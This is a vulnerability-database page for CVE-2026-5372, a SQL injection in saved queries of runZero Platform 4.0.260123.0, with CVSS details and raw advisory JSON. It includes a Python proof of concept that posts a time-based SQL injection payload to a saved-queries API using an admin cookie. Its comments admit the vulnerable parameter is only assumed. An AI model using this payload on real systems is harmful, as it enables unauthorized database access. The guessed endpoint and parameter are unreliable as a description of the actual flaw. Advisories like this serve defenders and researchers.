Security Vulnerability Report
中文
CVE-2026-5372 CVSS 6.4 MEDIUM

CVE-2026-5372

Published: 2026-04-07 15:17:47
Last Modified: 2026-04-21 15:06:58
Source: 44488dab-36db-4358-99f9-bc116477f914

Description

An issue that allowed a SQL injection attack vector related to saved queries (introduced in version 4.0.260123.0). This is an instance of CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), and has an estimated CVSS score of CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H (6.4 Medium). This issue was fixed in version 4.0.260123.1 of the runZero Platform.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:runzero:runzero_platform:4.0.260123.0:*:*:*:*:*:*:* - VULNERABLE
runZero Platform 4.0.260123.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: runZero Platform Saved Queries SQL Injection PoC # Date: 2026-04-07 # Exploit Author: Analyst # Vendor Homepage: https://www.runzero.com/ # Version: 4.0.260123.0 # CVE: CVE-2026-5372 def exploit_sqli(target_url, admin_cookie): """ This PoC demonstrates the SQL injection vulnerability in saved queries. It requires a high-privileged session cookie. """ headers = { "Cookie": admin_cookie, "Content-Type": "application/json" } # Malicious payload to test SQL injection (Time-based) # Assuming the vulnerable parameter is 'query_name' or similar within the saved query object payload = { "name": "Test Query' OR SLEEP(5)--", "query": "SELECT * FROM assets" } try: response = requests.post(f"{target_url}/api/v1.0/saved_queries", json=payload, headers=headers, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed: Database delay detected.") else: print("[-] Vulnerability not detected or request failed.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Replace with actual target and credentials target = "http://runzero-target:3000" cookie = "session_id=high_privileged_session_token" exploit_sqli(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5372", "sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "published": "2026-04-07T15:17:46.973", "lastModified": "2026-04-21T15:06:58.003", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue that allowed a SQL injection attack vector related to saved queries (introduced in version 4.0.260123.0). This is an instance of CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), and has an estimated CVSS score of CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H (6.4 Medium). This issue was fixed in version 4.0.260123.1 of the runZero Platform."}], "metrics": {"cvssMetricV31": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:runzero:runzero_platform:4.0.260123.0:*:*:*:*:*:*:*", "matchCriteriaId": "D9B3BEBE-774C-4FF8-9F98-D9D8F6340881"}]}]}], "references": [{"url": "https://help.runzero.com/docs/release-notes/#402602020", "source": "44488dab-36db-4358-99f9-bc116477f914", "tags": ["Release Notes"]}, {"url": "https://www.runzero.com/advisories/runzero-platform-saved-sqli-cve-2026-5372/", "source": "44488dab-36db-4358-99f9-bc116477f914", "tags": ["Vendor Advisory"]}]}}